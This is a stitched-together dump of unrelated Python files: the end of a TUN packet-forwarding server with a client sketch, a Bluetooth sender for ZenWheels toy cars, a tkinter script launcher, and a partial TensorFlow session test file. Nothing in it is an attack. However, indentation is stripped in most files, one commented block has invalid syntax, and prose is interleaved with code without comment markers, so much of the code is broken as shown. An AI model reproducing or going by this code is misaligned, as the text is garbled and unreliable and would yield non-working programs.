            if recv_more() == 'server exit!':
                return 'err'
        data = self.cache[0:length]
        self.cache = self.cache[length:]
        return data
def recv_select():
    '''Read loop: pull complete packets from readable client sockets into pkg_recv.'''
    while True:
        event_list = selector.select()
        for key, event in event_list:
            sock_queue = key.data            # the SockRecvQueue registered in add_virtual_net()
            if event & EVENT_READ:
                pkg = sock_queue.recv_pkg()
                if pkg != 'err':
                    pkg_recv.put(pkg)
                else:
                    selector.unregister(key.fileobj)
                    print('recv_pkg() --> err, client removed')
def ip_pkg_forward():
    '''Forward loop: send each queued packet to the client that owns its destination address.'''
    while True:
        pkg = pkg_recv.get()
        src, dst = pkg[12:16], pkg[16:20]    # source address, destination address (IPv4 header offsets)
        dst_ip = socket.inet_ntoa(dst)
        if dst_ip in sock_dict:              ### optionally also check that src is a known client
            # re-apply the 2-byte length prefix so the receiving client can frame the packet
            sock_dict[dst_ip].conn.send(pack('!H', len(pkg)) + pkg)
        else:
            print('destination {} unreachable'.format(dst_ip))
'''
def LAN_forward(sock)
selector = DefaultSelector()
selector.register(sock,EVENT_READ)
    cache = b''  # recv_pkg() cache
while True:
event_list = selector.select()
for key , event in event_list:
conn = key.fileobj
if event == EVENT_READ:
data = recv_pkg(sock)
elif event == EVENT_WRITE:
pass
else:
pass
'''
def work():
server_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM,0)
server_sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,True)
server_sock.bind((ADDR,PORT))
server_sock.listen(128)
#selector = selectors.DefaultSelector()
#selector.register(server_sock,selectors.EVENT_READ)
pkg_recv_th = Thread(target=recv_select)
pkg_recv_th.start()
ip_pkg_forward_th = Thread(target=ip_pkg_forward)
ip_pkg_forward_th.start()
    while True:
        sock, addr = server_sock.accept()
        print('{} : {}:{} connected'.format(ctime(), *addr))
        add_virtual_net(SockRecvQueue(sock))   # wrap the raw socket so recv_pkg() can buffer per client
work()
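For reference, a client of tun_server2.py has to complete a small handshake (receive its 4-byte virtual address, answer b'ok') and frame every IP packet with the 2-byte big-endian length prefix that SockRecvQueue unpacks. A minimal client-side sketch under those assumptions; the server address and packet bytes are placeholders.

import socket
from struct import pack

def send_one_packet(server_addr, ip_packet):
    """Handshake with tun_server2 and send a single length-prefixed IP packet."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(server_addr)                          # e.g. ('127.0.0.1', 6789) -- placeholder
    virtual_ip = socket.inet_ntoa(s.recv(4))        # server replies with the assigned 172.16.10.x address
    s.send(b'ok')                                   # acknowledgement expected by add_virtual_net()
    s.send(pack('!H', len(ip_packet)) + ip_packet)  # 2-byte big-endian length, then the raw packet
    return virtual_ip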
|
comms.py
|
import os   # used by read_cars_csv() below
import select
import threading
import time
import csv
from bluetooth import *
from constants import *
msgHeader = "[CAR COMMS]: "
BT_LOOP_SLEEP = 25  # milliseconds between passes of the bt_send() loop
def read_cars_csv():
file = csv.DictReader(open(os.path.join(ZENWHEELS_DIR, 'cars.csv')))
cars = []
for row in file:
cars.append(row)
return cars
class CarCommunicator():
def __init__(self):
self.cars_info = read_cars_csv()
self.active_vehicles = None
self.car_sockets = {}
def connectToCars(self, vehicles):
print(msgHeader + "Connecting to the ZenWheels cars...")
self.active_vehicles = vehicles
for vehicle in self.active_vehicles:
car_id = vehicle.owner.ID
            if self.car_sockets.get(car_id) is not None:
print(msgHeader + "Already connected to " + car_id + ".")
continue
mac_address = None
for car in self.cars_info:
if car["Bluetooth SSID"] == car_id:
mac_address = car["MAC Address"]
break
if mac_address is None:
print(msgHeader + "Could not find a record for " + car_id + ".")
return False
# Try to connect to each car three times
connected = False
for attempt in range(1, 4):
try:
print(msgHeader + "Connecting to %s (Attempt %d)." % (car_id, attempt))
socket = BluetoothSocket(RFCOMM)
socket.connect((mac_address, 1))
self.car_sockets[car_id] = socket
print(msgHeader + "Connected to %s." % car_id)
connected = True
break
except (BluetoothError, OSError) as e:
print(msgHeader + "Could not connect to %s because %s." % (car_id, e))
            if not connected:
print(msgHeader + "All connection attempts to %s failed." % (car_id))
return False
self.startCarComms()
return True
def startCarComms(self):
t_process = threading.Thread(target=self.bt_send)
t_process.daemon = True
t_process.start()
    def bt_send(self):
        # Continuously drain each vehicle's command queue over its Bluetooth socket.
while True:
for vehicle in self.active_vehicles:
socket = self.car_sockets[vehicle.owner.ID]
if socket is None: continue # Connection to this car was lost.
try:
can_read, can_write, has_error = select.select([], [socket], [], 0)
if socket in can_write:
try:
if not vehicle.command_queue:
continue
command = vehicle.command_queue.popitem()
socket.send(command[0])
except Exception as e:
print(msgHeader + str(e))
pass
except (BluetoothError, OSError, ValueError) as e:
print(msgHeader + str(e))
socket.close()
self.car_sockets[vehicle.owner.ID] = None
# Ray: Sleep is essential otherwise all system resources are taken and total system delay skyrockets.
time.sleep(BT_LOOP_SLEEP / 1000)
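connectToCars() resolves each vehicle's MAC address from cars.csv by its "Bluetooth SSID" column. A minimal sketch of the expected file layout follows; the SSID and MAC values are placeholders.

import csv

# Write a placeholder cars.csv with the two columns consulted above.
with open('cars.csv', 'w', newline='') as f:
    writer = csv.DictWriter(f, fieldnames=['Bluetooth SSID', 'MAC Address'])
    writer.writeheader()
    writer.writerow({'Bluetooth SSID': 'CAR01', 'MAC Address': '00:06:66:AA:BB:CC'})

# read_cars_csv() above returns rows shaped like these.
for row in csv.DictReader(open('cars.csv')):
    print(row['Bluetooth SSID'], row['MAC Address'])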
|
auto_run_script.py
|
from runpy import run_path
from tkinter import *
import multiprocessing
import os
def make_app():
app = Tk()
    Label(app, text='Available scripts to run', font=('Hack', 20, 'bold')).pack()
Listbox(app, name='listb', bg='#FFF68F',fg='Aquamarine').pack(fill=BOTH, expand=True)
# Listbox(name='listb').pack()
Button(text='start', command=run_script).pack()
Button(text='stop', command=stop_script).pack()
app.geometry('400x400')
return app
def ui_make_list():
listb = app.children['listb']
for d in os.listdir():
listb.insert(END, d)
def run_script():
listb = app.children['listb']
s_path = listb.get(ACTIVE)
p = multiprocessing.Process(name='print', target=run_path, args=(s_path,))
p.start()
def stop_script():
for p in multiprocessing.active_children():
if p.name == 'print':
p.terminate()
def watcher():
print(multiprocessing.active_children())
listb = app.children['listb']
s_path = listb.get(ACTIVE)
print(s_path)
app.after(1000, watcher)
if __name__ == '__main__':
app = make_app()
app.after(100, ui_make_list)
app.after(0, watcher)
app.mainloop()
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import sys
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
ops._USE_C_API = True
# NOTE(mrry): Dummy shape registration for ops used in the tests, since they
# don't have C++ op registrations on which to attach C++ shape fns.
ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]],
dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config = config_pb2.ConfigProto()
pool = config.session_inter_op_thread_pool.add()
with session.Session(config=config) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config.session_inter_op_thread_pool) - 1)
with session.Session(config=config) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
@test_util.disable_c_api # No shape registration for 'ConstructionFails'
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
self.assertEquals(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
self.assertEquals(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c), ABC(a=a, b=b, c=c),
{'a': a.name, 'c': c, 'b': b}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c),
{'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(DEFG(d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({'d': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {'a': a.name, 'c': c, 'b': b}})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(
sp2, {sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(
sp, {sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(
sp2, {sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
